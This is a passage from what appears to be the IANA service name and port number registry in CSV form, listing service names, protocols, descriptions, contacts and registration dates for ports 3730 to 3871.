client-ctrl,3730,tcp,Client Control,[Lawrence_W_Dunn],[Lawrence_W_Dunn],2003-04,,,,, client-ctrl,3730,udp,Client Control,[Lawrence_W_Dunn],[Lawrence_W_Dunn],2003-04,,,,, smap,3731,tcp,Service Manager,,,,,,,, smap,3731,udp,Service Manager,,,,,,,, m-wnn,3732,tcp,Mobile Wnn,[Yasunari_Yamashita],[Yasunari_Yamashita],2003-04,,,,, m-wnn,3732,udp,Mobile Wnn,[Yasunari_Yamashita],[Yasunari_Yamashita],2003-04,,,,, multip-msg,3733,tcp,Multipuesto Msg Port,[Felisa_Ares],[Felisa_Ares],2003-04,,,,, multip-msg,3733,udp,Multipuesto Msg Port,[Felisa_Ares],[Felisa_Ares],2003-04,,,,, synel-data,3734,tcp,Synel Data Collection Port,[David_Ashkenazi],[David_Ashkenazi],2003-04,,,,, synel-data,3734,udp,Synel Data Collection Port,[David_Ashkenazi],[David_Ashkenazi],2003-04,,,,, pwdis,3735,tcp,Password Distribution,[Robert_Erl],[Robert_Erl],2003-04,,,,, pwdis,3735,udp,Password Distribution,[Robert_Erl],[Robert_Erl],2003-04,,,,, rs-rmi,3736,tcp,RealSpace RMI,[Barry_McDarby],[Barry_McDarby],2003-04,,,,, rs-rmi,3736,udp,RealSpace RMI,[Barry_McDarby],[Barry_McDarby],2003-04,,,,, xpanel,3737,tcp,XPanel Daemon,[Lilian_Rudenco],[Lilian_Rudenco],2009-03-04,,,,, ,3737,udp,Reserved,,,,,,,, versatalk,3738,tcp,versaTalk Server Port,[Dr_Kingsley_C_Nwos],[Dr_Kingsley_C_Nwos],2003-04,,,,, versatalk,3738,udp,versaTalk Server Port,[Dr_Kingsley_C_Nwos],[Dr_Kingsley_C_Nwos],2003-04,,,,, launchbird-lm,3739,tcp,Launchbird LicenseManager,[Tom_Hawkins],[Tom_Hawkins],2003-04,,,,, launchbird-lm,3739,udp,Launchbird LicenseManager,[Tom_Hawkins],[Tom_Hawkins],2003-04,,,,, heartbeat,3740,tcp,Heartbeat Protocol,[Jeroen_Massar],[Jeroen_Massar],2003-04,,,,, heartbeat,3740,udp,Heartbeat Protocol,[Jeroen_Massar],[Jeroen_Massar],2003-04,,,,, wysdma,3741,tcp,WysDM Agent,[Jim_McDonald],[Jim_McDonald],2003-04,,,,, wysdma,3741,udp,WysDM Agent,[Jim_McDonald],[Jim_McDonald],2003-04,,,,, cst-port,3742,tcp,CST - Configuration & Service Tracker,[Hai_Ou_Yang],[Hai_Ou_Yang],2003-04,,,,, cst-port,3742,udp,CST - Configuration & Service Tracker,[Hai_Ou_Yang],[Hai_Ou_Yang],2003-04,,,,, ipcs-command,3743,tcp,IP Control Systems Ltd.,[Paul_Anderson],[Paul_Anderson],2003-04,,,,, ipcs-command,3743,udp,IP Control Systems Ltd.,[Paul_Anderson],[Paul_Anderson],2003-04,,,,, sasg,3744,tcp,SASG,[Cristian_Petculescu_2],[Cristian_Petculescu_2],2003-04,,,,, sasg,3744,udp,SASG,[Cristian_Petculescu_2],[Cristian_Petculescu_2],2003-04,,,,, gw-call-port,3745,tcp,GWRTC Call Port,[Felisa_Ares],[Felisa_Ares],2003-04,,,,, gw-call-port,3745,udp,GWRTC Call Port,[Felisa_Ares],[Felisa_Ares],2003-04,,,,, linktest,3746,tcp,LXPRO.COM LinkTest,,,,,,,, linktest,3746,udp,LXPRO.COM LinkTest,,,,,,,, linktest-s,3747,tcp,LXPRO.COM LinkTest SSL,[Greg_Bailey],[Greg_Bailey],2003-04,,,,, linktest-s,3747,udp,LXPRO.COM LinkTest SSL,[Greg_Bailey],[Greg_Bailey],2003-04,,,,, webdata,3748,tcp,webData,[Michael_Whiteley],[Michael_Whiteley],2003-04,,,,, webdata,3748,udp,webData,[Michael_Whiteley],[Michael_Whiteley],2003-04,,,,, cimtrak,3749,tcp,CimTrak,[Robert_E_Johnson_II],[Robert_E_Johnson_II],2003-04,,,,, cimtrak,3749,udp,CimTrak,[Robert_E_Johnson_II],[Robert_E_Johnson_II],2003-04,,,,, cbos-ip-port,3750,tcp,CBOS/IP ncapsalation port,[Thomas_Dannemiller],[Thomas_Dannemiller],2003-04,,,,, cbos-ip-port,3750,udp,CBOS/IP ncapsalatoin port,[Thomas_Dannemiller],[Thomas_Dannemiller],2003-04,,,,, gprs-cube,3751,tcp,CommLinx GPRS Cube,[Peter_Johnson],[Peter_Johnson],2003-04,,,,, gprs-cube,3751,udp,CommLinx GPRS Cube,[Peter_Johnson],[Peter_Johnson],2003-04,,,,, vipremoteagent,3752,tcp,Vigil-IP RemoteAgent,[Bryan_Alvord],[Bryan_Alvord],2003-04,,,,, vipremoteagent,3752,udp,Vigil-IP RemoteAgent,[Bryan_Alvord],[Bryan_Alvord],2003-04,,,,, nattyserver,3753,tcp,NattyServer Port,[Akira_Saito],[Akira_Saito],2003-04,,,,, nattyserver,3753,udp,NattyServer Port,[Akira_Saito],[Akira_Saito],2003-04,,,,, timestenbroker,3754,tcp,TimesTen Broker Port,[David_Aspinwall],[David_Aspinwall],2003-04,,,,, timestenbroker,3754,udp,TimesTen Broker Port,[David_Aspinwall],[David_Aspinwall],2003-04,,,,, sas-remote-hlp,3755,tcp,SAS Remote Help Server,[Gary_T_Ciampa],[Gary_T_Ciampa],2003-04,,,,, sas-remote-hlp,3755,udp,SAS Remote Help Server,[Gary_T_Ciampa],[Gary_T_Ciampa],2003-04,,,,, canon-capt,3756,tcp,Canon CAPT Port,[Takashi_Okazawa],[Takashi_Okazawa],2003-04,,,,, canon-capt,3756,udp,Canon CAPT Port,[Takashi_Okazawa],[Takashi_Okazawa],2003-04,,,,, grf-port,3757,tcp,GRF Server Port,[Robert_Banfill],[Robert_Banfill],2003-04,,,,, grf-port,3757,udp,GRF Server Port,[Robert_Banfill],[Robert_Banfill],2003-04,,,,, apw-registry,3758,tcp,apw RMI registry,[Dan_Davis],[Dan_Davis],2003-04,,,,, apw-registry,3758,udp,apw RMI registry,[Dan_Davis],[Dan_Davis],2003-04,,,,, exapt-lmgr,3759,tcp,Exapt License Manager,[Christoph_Kukulies],[Christoph_Kukulies],2003-04,,,,, exapt-lmgr,3759,udp,Exapt License Manager,[Christoph_Kukulies],[Christoph_Kukulies],2003-04,,,,, adtempusclient,3760,tcp,adTempus Client,[Bill_Wingate],[Bill_Wingate],2003-05,,,,, adtempusclient,3760,udp,adTEmpus Client,[Bill_Wingate],[Bill_Wingate],2003-05,,,,, gsakmp,3761,tcp,gsakmp port,,,,,[RFC4535],,, gsakmp,3761,udp,gsakmp port,,,,,[RFC4535],,, gbs-smp,3762,tcp,GBS SnapMail Protocol,[Eric_Harris_Braun],[Eric_Harris_Braun],2003-06,,,,, gbs-smp,3762,udp,GBS SnapMail Protocol,[Eric_Harris_Braun],[Eric_Harris_Braun],2003-06,,,,, xo-wave,3763,tcp,XO Wave Control Port,[Bjorn_Dittmer_Roche],[Bjorn_Dittmer_Roche],2003-06,,,,, xo-wave,3763,udp,XO Wave Control Port,[Bjorn_Dittmer_Roche],[Bjorn_Dittmer_Roche],2003-06,,,,, mni-prot-rout,3764,tcp,MNI Protected Routing,[Tim_Behne],[Tim_Behne],2003-06,,,,, mni-prot-rout,3764,udp,MNI Protected Routing,[Tim_Behne],[Tim_Behne],2003-06,,,,, rtraceroute,3765,tcp,Remote Traceroute,[A_Blake_Cooper],[A_Blake_Cooper],2003-06,,,,, rtraceroute,3765,udp,Remote Traceroute,[A_Blake_Cooper],[A_Blake_Cooper],2003-06,,,,, sitewatch-s,3766,tcp,SSL e-watch sitewatch server,[e-Watch_Corporation],[John_M_Baird_2],2014-05-13,,,,,this port was previously updated on 2009-06-19 ,3766,udp,Reserved,,,,,,,,this port was previously updated on 2009-06-19 listmgr-port,3767,tcp,ListMGR Port,[Takashi_Kubota],[Takashi_Kubota],2003-06,,,,, listmgr-port,3767,udp,ListMGR Port,[Takashi_Kubota],[Takashi_Kubota],2003-06,,,,, rblcheckd,3768,tcp,rblcheckd server daemon,[Sabri_Berisha],[Sabri_Berisha],2003-06,,,,, rblcheckd,3768,udp,rblcheckd server daemon,[Sabri_Berisha],[Sabri_Berisha],2003-06,,,,, haipe-otnk,3769,tcp,HAIPE Network Keying,[Mike_Irani_2],[Mike_Irani_2],2003-06,,,,, haipe-otnk,3769,udp,HAIPE Network Keying,[Mike_Irani_2],[Mike_Irani_2],2003-06,,,,, cindycollab,3770,tcp,Cinderella Collaboration,[Ulrich_Kortenkamp],[Ulrich_Kortenkamp],2003-06,,,,, cindycollab,3770,udp,Cinderella Collaboration,[Ulrich_Kortenkamp],[Ulrich_Kortenkamp],2003-06,,,,, paging-port,3771,tcp,RTP Paging Port,[Patrick_Ferriter],[Patrick_Ferriter],2003-06,,,,, paging-port,3771,udp,RTP Paging Port,[Patrick_Ferriter],[Patrick_Ferriter],2003-06,,,,, ctp,3772,tcp,Chantry Tunnel Protocol,[Inderpreet_Singh],[Inderpreet_Singh],2003-06,,,,, ctp,3772,udp,Chantry Tunnel Protocol,[Inderpreet_Singh],[Inderpreet_Singh],2003-06,,,,, ctdhercules,3773,tcp,ctdhercules,[Carl_Banzhof],[Carl_Banzhof],2003-06,,,,, ctdhercules,3773,udp,ctdhercules,[Carl_Banzhof],[Carl_Banzhof],2003-06,,,,, zicom,3774,tcp,ZICOM,[Sabu_Das],[Sabu_Das],2003-06,,,,, zicom,3774,udp,ZICOM,[Sabu_Das],[Sabu_Das],2003-06,,,,, ispmmgr,3775,tcp,ISPM Manager Port,[Eric_Anderson],[Eric_Anderson],2003-06,,,,, ispmmgr,3775,udp,ISPM Manager Port,[Eric_Anderson],[Eric_Anderson],2003-06,,,,, dvcprov-port,3776,tcp,Device Provisioning Port,[Rob_Lehew],[Rob_Lehew],2003-06,,,,, dvcprov-port,3776,udp,Device Provisioning Port,[Rob_Lehew],[Rob_Lehew],2003-06,,,,, jibe-eb,3777,tcp,Jibe EdgeBurst,[Chap_Tippin],[Chap_Tippin],2003-06,,,,, jibe-eb,3777,udp,Jibe EdgeBurst,[Chap_Tippin],[Chap_Tippin],2003-06,,,,, c-h-it-port,3778,tcp,Cutler-Hammer IT Port,[Thomas_Ruchti],[Thomas_Ruchti],2003-06,,,,, c-h-it-port,3778,udp,Cutler-Hammer IT Port,[Thomas_Ruchti],[Thomas_Ruchti],2003-06,,,,, cognima,3779,tcp,Cognima Replication,[Ralph_Greenwell],[Ralph_Greenwell],2003-06,,,,, cognima,3779,udp,Cognima Replication,[Ralph_Greenwell],[Ralph_Greenwell],2003-06,,,,, nnp,3780,tcp,Nuzzler Network Protocol,[Andreas_Schwarz_2],[Andreas_Schwarz_2],2003-06,,,,, nnp,3780,udp,Nuzzler Network Protocol,[Andreas_Schwarz_2],[Andreas_Schwarz_2],2003-06,,,,, abcvoice-port,3781,tcp,ABCvoice server port,[Carlos_Gonzalez_Roma],[Carlos_Gonzalez_Roma],2003-06,,,,, abcvoice-port,3781,udp,ABCvoice server port,[Carlos_Gonzalez_Roma],[Carlos_Gonzalez_Roma],2003-06,,,,, iso-tp0s,3782,tcp,Secure ISO TP0 port,[Herbert_Falk],[Herbert_Falk],2003-06,,,,, iso-tp0s,3782,udp,Secure ISO TP0 port,[Herbert_Falk],[Herbert_Falk],2003-06,,,,, bim-pem,3783,tcp,Impact Mgr./PEM Gateway,[Walter_G_Giroir],[Walter_G_Giroir],2003-07,,,,, bim-pem,3783,udp,Impact Mgr./PEM Gateway,[Walter_G_Giroir],[Walter_G_Giroir],2003-07,,,,, bfd-control,3784,tcp,BFD Control Protocol,,,,,[RFC5881],,, bfd-control,3784,udp,BFD Control Protocol,,,,,[RFC5881],,, bfd-echo,3785,tcp,BFD Echo Protocol,,,,,[RFC5881],,, bfd-echo,3785,udp,BFD Echo Protocol,,,,,[RFC5881],,, upstriggervsw,3786,tcp,VSW Upstrigger port,[Mark_Tim_Junghanns],[Mark_Tim_Junghanns],2003-07,,,,, upstriggervsw,3786,udp,VSW Upstrigger port,[Mark_Tim_Junghanns],[Mark_Tim_Junghanns],2003-07,,,,, fintrx,3787,tcp,Fintrx,[Peter_G_L_Potgiese],[Peter_G_L_Potgiese],2003-07,,,,, fintrx,3787,udp,Fintrx,[Peter_G_L_Potgiese],[Peter_G_L_Potgiese],2003-07,,,,, isrp-port,3788,tcp,SPACEWAY Routing port,[Vaibhav_Kumar],[Vaibhav_Kumar],2003-07,,,,, isrp-port,3788,udp,SPACEWAY Routing port,[Vaibhav_Kumar],[Vaibhav_Kumar],2003-07,,,,, remotedeploy,3789,tcp,RemoteDeploy Administration Port [July 2003],[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, remotedeploy,3789,udp,RemoteDeploy Administration Port [July 2003],[Detlef_Rothe],[Detlef_Rothe],2009-05-15,,,,, quickbooksrds,3790,tcp,QuickBooks RDS,[Almira],[Almira],2003-07,,,,, quickbooksrds,3790,udp,QuickBooks RDS,[Almira],[Almira],2003-07,,,,, tvnetworkvideo,3791,tcp,TV NetworkVideo Data port,[Kevin_Brunner],[Kevin_Brunner],2003-07,,,,, tvnetworkvideo,3791,udp,TV NetworkVideo Data port,[Kevin_Brunner],[Kevin_Brunner],2003-07,,,,, sitewatch,3792,tcp,e-Watch Corporation SiteWatch,[John_M_Baird],[John_M_Baird],2003-07,,,,, sitewatch,3792,udp,e-Watch Corporation SiteWatch,[John_M_Baird],[John_M_Baird],2003-07,,,,, dcsoftware,3793,tcp,DataCore Software,[Andre_Cato],[Andre_Cato],2003-07,,,,, dcsoftware,3793,udp,DataCore Software,[Andre_Cato],[Andre_Cato],2003-07,,,,, jaus,3794,tcp,JAUS Robots,[Steven_B_Cliff],[Steven_B_Cliff],2003-07,,,,, jaus,3794,udp,JAUS Robots,[Steven_B_Cliff],[Steven_B_Cliff],2003-07,,,,, myblast,3795,tcp,myBLAST Mekentosj port,[Alexander_Griekspoor],[Alexander_Griekspoor],2003-07,,,,, myblast,3795,udp,myBLAST Mekentosj port,[Alexander_Griekspoor],[Alexander_Griekspoor],2003-07,,,,, spw-dialer,3796,tcp,Spaceway Dialer,[Patrick_Fisher],[Patrick_Fisher],2003-07,,,,, spw-dialer,3796,udp,Spaceway Dialer,[Patrick_Fisher],[Patrick_Fisher],2003-07,,,,, idps,3797,tcp,idps,[Jean_Francois_Rabass],[Jean_Francois_Rabass],2003-07,,,,, idps,3797,udp,idps,[Jean_Francois_Rabass],[Jean_Francois_Rabass],2003-07,,,,, minilock,3798,tcp,Minilock,[Daniel_Julio_Reyes],[Daniel_Julio_Reyes],2003-08,,,,, minilock,3798,udp,Minilock,[Daniel_Julio_Reyes],[Daniel_Julio_Reyes],2003-08,,,,, radius-dynauth,3799,tcp,RADIUS Dynamic Authorization,,,,,[RFC3576],,, radius-dynauth,3799,udp,RADIUS Dynamic Authorization,,,,,[RFC3576],,, pwgpsi,3800,tcp,Print Services Interface,[Harry_Lewis],[Harry_Lewis],2003-05,,,,, pwgpsi,3800,udp,Print Services Interface,[Harry_Lewis],[Harry_Lewis],2003-05,,,,, ibm-mgr,3801,tcp,ibm manager service,[Tim_Hahn],[Tim_Hahn],2006-03,,,,, ibm-mgr,3801,udp,ibm manager service,[Tim_Hahn],[Tim_Hahn],2006-03,,,,, vhd,3802,tcp,VHD,[Chris_Duncombe],[Chris_Duncombe],,,,,, vhd,3802,udp,VHD,[Chris_Duncombe],[Chris_Duncombe],,,,,, soniqsync,3803,tcp,SoniqSync,[Ryan_Melville],[Ryan_Melville],2004-01,,,,, soniqsync,3803,udp,SoniqSync,[Ryan_Melville],[Ryan_Melville],2004-01,,,,, iqnet-port,3804,tcp,Harman IQNet Port,[Bruce_Vander_Werf],[Bruce_Vander_Werf],2004-02,,,,, iqnet-port,3804,udp,Harman IQNet Port,[Bruce_Vander_Werf],[Bruce_Vander_Werf],2004-02,,,,, tcpdataserver,3805,tcp,ThorGuard Server Port,[Joel_E_Steiger],[Joel_E_Steiger],2004-02,,,,, tcpdataserver,3805,udp,ThorGuard Server Port,[Joel_E_Steiger],[Joel_E_Steiger],2004-02,,,,, wsmlb,3806,tcp,Remote System Manager,[Thomas_Fiege],[Thomas_Fiege],2004-02,,,,, wsmlb,3806,udp,Remote System Manager,[Thomas_Fiege],[Thomas_Fiege],2004-02,,,,, spugna,3807,tcp,SpuGNA Communication Port,[Samuele_Sequi],[Samuele_Sequi],2004-02,,,,, spugna,3807,udp,SpuGNA Communication Port,[Samuele_Sequi],[Samuele_Sequi],2004-02,,,,, sun-as-iiops-ca,3808,tcp,Sun App Svr-IIOPClntAuth,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, sun-as-iiops-ca,3808,udp,Sun App Svr-IIOPClntAuth,[Abhijit_Kumar],[Abhijit_Kumar],2005-11,,,,, apocd,3809,tcp,Java Desktop System Configuration Agent,[Geoff_Higgins],[Geoff_Higgins],2006-03,,,,, apocd,3809,udp,Java Desktop System Configuration Agent,[Geoff_Higgins],[Geoff_Higgins],2006-03,,,,, wlanauth,3810,tcp,WLAN AS server,[Bianling_Zhang],[Bianling_Zhang],2004-02,,,,, wlanauth,3810,udp,WLAN AS server,[Bianling_Zhang],[Bianling_Zhang],2004-02,,,,, amp,3811,tcp,AMP,[Northon_Rodrigues],[Northon_Rodrigues],2004-02,,,,, amp,3811,udp,AMP,[Northon_Rodrigues],[Northon_Rodrigues],2004-02,,,,, neto-wol-server,3812,tcp,netO WOL Server,[Martin_Bestmann_2],[Martin_Bestmann_2],2004-03,,,,, neto-wol-server,3812,udp,netO WOL Server,[Martin_Bestmann_2],[Martin_Bestmann_2],2004-03,,,,, rap-ip,3813,tcp,Rhapsody Interface Protocol,[Paul_Zander],[Paul_Zander],2004-03,,,,, rap-ip,3813,udp,Rhapsody Interface Protocol,[Paul_Zander],[Paul_Zander],2004-03,,,,, neto-dcs,3814,tcp,netO DCS,[Martin_Bestmann_2],[Martin_Bestmann_2],2004-03,,,,, neto-dcs,3814,udp,netO DCS,[Martin_Bestmann_2],[Martin_Bestmann_2],2004-03,,,,, lansurveyorxml,3815,tcp,LANsurveyor XML,[Michael_Swan],[Michael_Swan],2004-04,,,,, lansurveyorxml,3815,udp,LANsurveyor XML,[Michael_Swan],[Michael_Swan],2004-04,,,,, sunlps-http,3816,tcp,Sun Local Patch Server,[Barry_Greenberg],[Barry_Greenberg],2004-04,,,,, sunlps-http,3816,udp,Sun Local Patch Server,[Barry_Greenberg],[Barry_Greenberg],2004-04,,,,, tapeware,3817,tcp,Yosemite Tech Tapeware,[Luke_Dion],[Luke_Dion],2004-04,,,,, tapeware,3817,udp,Yosemite Tech Tapeware,[Luke_Dion],[Luke_Dion],2004-04,,,,, crinis-hb,3818,tcp,Crinis Heartbeat,[Eric_McMurry],[Eric_McMurry],2004-04,,,,, crinis-hb,3818,udp,Crinis Heartbeat,[Eric_McMurry],[Eric_McMurry],2004-04,,,,, epl-slp,3819,tcp,EPL Sequ Layer Protocol,[Hans_Weibel],[Hans_Weibel],2004-10,,,,, epl-slp,3819,udp,EPL Sequ Layer Protocol,[Hans_Weibel],[Hans_Weibel],2004-10,,,,, scp,3820,tcp,Siemens AuD SCP,[Johann_Arnold],[Johann_Arnold],2004-10,,,,, scp,3820,udp,Siemens AuD SCP,[Johann_Arnold],[Johann_Arnold],2004-10,,,,, pmcp,3821,tcp,ATSC PMCP Standard,[Graham_Jones],[Graham_Jones],2004-11,,,,, pmcp,3821,udp,ATSC PMCP Standard,[Graham_Jones],[Graham_Jones],2004-11,,,,, acp-discovery,3822,tcp,Compute Pool Discovery,,,,,,,, acp-discovery,3822,udp,Compute Pool Discovery,,,,,,,, acp-conduit,3823,tcp,Compute Pool Conduit,,,,,,,, acp-conduit,3823,udp,Compute Pool Conduit,,,,,,,, acp-policy,3824,tcp,Compute Pool Policy,[Andy_Belk_2],[Andy_Belk_2],2005-02,,,,, acp-policy,3824,udp,Compute Pool Policy,[Andy_Belk_2],[Andy_Belk_2],2005-02,,,,, ffserver,3825,tcp,Antera FlowFusion Process Simulation,[Armin_Liebchen],[Armin_Liebchen],2007-06,,,,, ffserver,3825,udp,Antera FlowFusion Process Simulation,[Armin_Liebchen],[Armin_Liebchen],2007-06,,,,, warmux,3826,tcp,WarMUX game server,[Christophe_Gisquet],[Christophe_Gisquet],,2011-05-26,,,, warmux,3826,udp,WarMUX game server,[Christophe_Gisquet],[Christophe_Gisquet],,2011-05-26,,,, netmpi,3827,tcp,Netadmin Systems MPI service,[G_Runfeldt],[G_Runfeldt],2007-07-10,,,,, netmpi,3827,udp,Netadmin Systems MPI service,[G_Runfeldt],[G_Runfeldt],2007-07-10,,,,, neteh,3828,tcp,Netadmin Systems Event Handler,,,,,,,, neteh,3828,udp,Netadmin Systems Event Handler,,,,,,,, neteh-ext,3829,tcp,Netadmin Systems Event Handler External,[Jonas_Krogell],[Jonas_Krogell],2007-07-10,,,,, neteh-ext,3829,udp,Netadmin Systems Event Handler External,[Jonas_Krogell],[Jonas_Krogell],2007-07-10,,,,, cernsysmgmtagt,3830,tcp,Cerner System Management Agent,[Mike_Craft],[Mike_Craft],2008-01-29,,,,, cernsysmgmtagt,3830,udp,Cerner System Management Agent,[Mike_Craft],[Mike_Craft],2008-01-29,,,,, dvapps,3831,tcp,Docsvault Application Service,[Ketul_Patel],[Ketul_Patel],2006-10,,,,, dvapps,3831,udp,Docsvault Application Service,[Ketul_Patel],[Ketul_Patel],2006-10,,,,, xxnetserver,3832,tcp,xxNETserver,[XXT_LLC],[Matt_Ferrari],2006-10,2012-07-12,,,, xxnetserver,3832,udp,xxNETserver,[XXT_LLC],[Matt_Ferrari],2006-10,2012-07-12,,,, aipn-auth,3833,tcp,AIPN LS Authentication,[Qiang_Zhang],[Qiang_Zhang],2006-10,,,,, aipn-auth,3833,udp,AIPN LS Authentication,[Qiang_Zhang],[Qiang_Zhang],2006-10,,,,, spectardata,3834,tcp,Spectar Data Stream Service,,,,,,,, spectardata,3834,udp,Spectar Data Stream Service,,,,,,,, spectardb,3835,tcp,Spectar Database Rights Service,[Jan_Rutger_Voorhorst],[Jan_Rutger_Voorhorst],2006-10,,,,, spectardb,3835,udp,Spectar Database Rights Service,[Jan_Rutger_Voorhorst],[Jan_Rutger_Voorhorst],2006-10,,,,, markem-dcp,3836,tcp,MARKEM NEXTGEN DCP,,,,,,,, markem-dcp,3836,udp,MARKEM NEXTGEN DCP,,,,,,,, mkm-discovery,3837,tcp,MARKEM Auto-Discovery,[Vadym_Kargin],[Vadym_Kargin],2005-08,,,,, mkm-discovery,3837,udp,MARKEM Auto-Discovery,[Vadym_Kargin],[Vadym_Kargin],2005-08,,,,, sos,3838,tcp,Scito Object Server,[Arno_Klaassen],[Arno_Klaassen],2003-11,,,,, sos,3838,udp,Scito Object Server,[Arno_Klaassen],[Arno_Klaassen],2003-11,,,,, amx-rms,3839,tcp,AMX Resource Management Suite,[Ron_Barber],[Ron_Barber],2003-11,,,,, amx-rms,3839,udp,AMX Resource Management Suite,[Ron_Barber],[Ron_Barber],2003-11,,,,, flirtmitmir,3840,tcp,www.FlirtMitMir.de,[Carsten_Falticska],[Carsten_Falticska],2003-11,,,,, flirtmitmir,3840,udp,www.FlirtMitMir.de,[Carsten_Falticska],[Carsten_Falticska],2003-11,,,,, zfirm-shiprush3,3841,tcp,Z-Firm ShipRush v3,[Rafael_Zimberoff],[Rafael_Zimberoff],2003-11,,,,, zfirm-shiprush3,3841,udp,Z-Firm ShipRush v3,[Rafael_Zimberoff],[Rafael_Zimberoff],2003-11,,,,, nhci,3842,tcp,NHCI status port,[Eric_Welch_2],[Eric_Welch_2],2003-11,,,,, nhci,3842,udp,NHCI status port,[Eric_Welch_2],[Eric_Welch_2],2003-11,,,,, quest-agent,3843,tcp,Quest Common Agent,[Peter_Maher],[Peter_Maher],2003-11,,,,, quest-agent,3843,udp,Quest Common Agent,[Peter_Maher],[Peter_Maher],2003-11,,,,, rnm,3844,tcp,RNM,[sn_w_of_renegade_lab],[sn_w_of_renegade_lab],2003-11,,,,, rnm,3844,udp,RNM,[sn_w_of_renegade_lab],[sn_w_of_renegade_lab],2003-11,,,,, v-one-spp,3845,tcp,V-ONE Single Port Proxy,[Daniel_Becker_3],[Daniel_Becker_3],,,,,, v-one-spp,3845,udp,V-ONE Single Port Proxy,[Daniel_Becker_3],[Daniel_Becker_3],,,,,, an-pcp,3846,tcp,Astare Network PCP,[Tony_Gulino],[Tony_Gulino],2003-08,,,,, an-pcp,3846,udp,Astare Network PCP,[Tony_Gulino],[Tony_Gulino],2003-08,,,,, msfw-control,3847,tcp,MS Firewall Control,[Oren_Trutner],[Oren_Trutner],2003-08,,,,, msfw-control,3847,udp,MS Firewall Control,[Oren_Trutner],[Oren_Trutner],2003-08,,,,, item,3848,tcp,IT Environmental Monitor,[Keith_Wright],[Keith_Wright],2003-08,,,,, item,3848,udp,IT Environmental Monitor,[Keith_Wright],[Keith_Wright],2003-08,,,,, spw-dnspreload,3849,tcp,SPACEWAY DNS Preload,[Daniel_Friedman],[Daniel_Friedman],2003-08,,,,, spw-dnspreload,3849,udp,SPACEWAY DNS Prelaod,[Daniel_Friedman],[Daniel_Friedman],2003-08,,,,, qtms-bootstrap,3850,tcp,QTMS Bootstrap Protocol,[Phil_Willis],[Phil_Willis],2003-08,,,,, qtms-bootstrap,3850,udp,QTMS Bootstrap Protocol,[Phil_Willis],[Phil_Willis],2003-08,,,,, spectraport,3851,tcp,SpectraTalk Port,[Madhav_Karhade],[Madhav_Karhade],2003-08,,,,, spectraport,3851,udp,SpectraTalk Port,[Madhav_Karhade],[Madhav_Karhade],2003-08,,,,, sse-app-config,3852,tcp,SSE App Configuration,[Tim_Wilson],[Tim_Wilson],2003-08,,,,, sse-app-config,3852,udp,SSE App Configuration,[Tim_Wilson],[Tim_Wilson],2003-08,,,,, sscan,3853,tcp,SONY scanning protocol,[Takashi_Aihara],[Takashi_Aihara],2003-08,,,,, sscan,3853,udp,SONY scanning protocol,[Takashi_Aihara],[Takashi_Aihara],2003-08,,,,, stryker-com,3854,tcp,Stryker Comm Port,[Andrew_Schultz],[Andrew_Schultz],2003-08,,,,, stryker-com,3854,udp,Stryker Comm Port,[Andrew_Schultz],[Andrew_Schultz],2003-08,,,,, opentrac,3855,tcp,OpenTRAC,[Scott_Miller],[Scott_Miller],2003-08,,,,, opentrac,3855,udp,OpenTRAC,[Scott_Miller],[Scott_Miller],2003-08,,,,, informer,3856,tcp,INFORMER,[Filippo_Fadda],[Filippo_Fadda],2003-08,,,,, informer,3856,udp,INFORMER,[Filippo_Fadda],[Filippo_Fadda],2003-08,,,,, trap-port,3857,tcp,Trap Port,[Norm_Freedman],[Norm_Freedman],2003-08,,,,, trap-port,3857,udp,Trap Port,[Norm_Freedman],[Norm_Freedman],2003-08,,,,, trap-port-mom,3858,tcp,Trap Port MOM,[Norm_Freedman],[Norm_Freedman],2003-08,,,,, trap-port-mom,3858,udp,Trap Port MOM,[Norm_Freedman],[Norm_Freedman],2003-08,,,,, nav-port,3859,tcp,Navini Port,[Chris_Sanders],[Chris_Sanders],2003-08,,,,, nav-port,3859,udp,Navini Port,[Chris_Sanders],[Chris_Sanders],2003-08,,,,, sasp,3860,tcp,Server/Application State Protocol (SASP),[Alan_Bivens],[Alan_Bivens],2003-08,,,,, sasp,3860,udp,Server/Application State Protocol (SASP),[Alan_Bivens],[Alan_Bivens],2003-08,,,,, winshadow-hd,3861,tcp,winShadow Host Discovery,[Shu_Wei_Tan],[Shu_Wei_Tan],2003-03,,,,, winshadow-hd,3861,udp,winShadow Host Discovery,[Shu_Wei_Tan],[Shu_Wei_Tan],2003-03,,,,, giga-pocket,3862,tcp,GIGA-POCKET,[Yoshikazu_Watanabe],[Yoshikazu_Watanabe],,,,,, giga-pocket,3862,udp,GIGA-POCKET,[Yoshikazu_Watanabe],[Yoshikazu_Watanabe],,,,,, asap-tcp,3863,tcp,asap tcp port,,,,,,,, asap-udp,3863,udp,asap udp port,,,,,[RFC5352],,, asap-sctp,3863,sctp,asap sctp,,,,,[RFC5352],,, asap-tcp-tls,3864,tcp,asap/tls tcp port,,,,,[RFC5352],,, ,3864,udp,Reserved,,,,,,,,This entry has been removed on 2006-06-23. asap-sctp-tls,3864,sctp,asap-sctp/tls,,,,,[RFC5352],,, xpl,3865,tcp,xpl automation protocol,[Ian_Lowe],[Ian_Lowe],2003-08,,,,, xpl,3865,udp,xpl automation protocol,[Ian_Lowe],[Ian_Lowe],2003-08,,,,, dzdaemon,3866,tcp,Sun SDViz DZDAEMON Port,[Kevin_Rushforth],[Kevin_Rushforth],2003-08,,,,, dzdaemon,3866,udp,Sun SDViz DZDAEMON Port,[Kevin_Rushforth],[Kevin_Rushforth],2003-08,,,,, dzoglserver,3867,tcp,Sun SDViz DZOGLSERVER Port,[Kevin_Rushforth],[Kevin_Rushforth],2003-08,,,,, dzoglserver,3867,udp,Sun SDViz DZOGLSERVER Port,[Kevin_Rushforth],[Kevin_Rushforth],2003-08,,,,, diameter,3868,tcp,DIAMETER,,,,,,,, ,3868,udp,Reserved,,,,,,,, diameter,3868,sctp,DIAMETER,,,,,[RFC3588],,, ovsam-mgmt,3869,tcp,hp OVSAM MgmtServer Disco,[Mike_Pontillo],[Mike_Pontillo],2003-08,,,,, ovsam-mgmt,3869,udp,hp OVSAM MgmtServer Disco,[Mike_Pontillo],[Mike_Pontillo],2003-08,,,,, ovsam-d-agent,3870,tcp,hp OVSAM HostAgent Disco,[Mike_Pontillo],[Mike_Pontillo],2003-08,,,,, ovsam-d-agent,3870,udp,hp OVSAM HostAgent Disco,[Mike_Pontillo],[Mike_Pontillo],2003-08,,,,, avocent-adsap,3871,tcp,Avocent DS Authorization,[Eduardo_Fernandez],[Eduardo_Fernandez],2003-08,,,,, 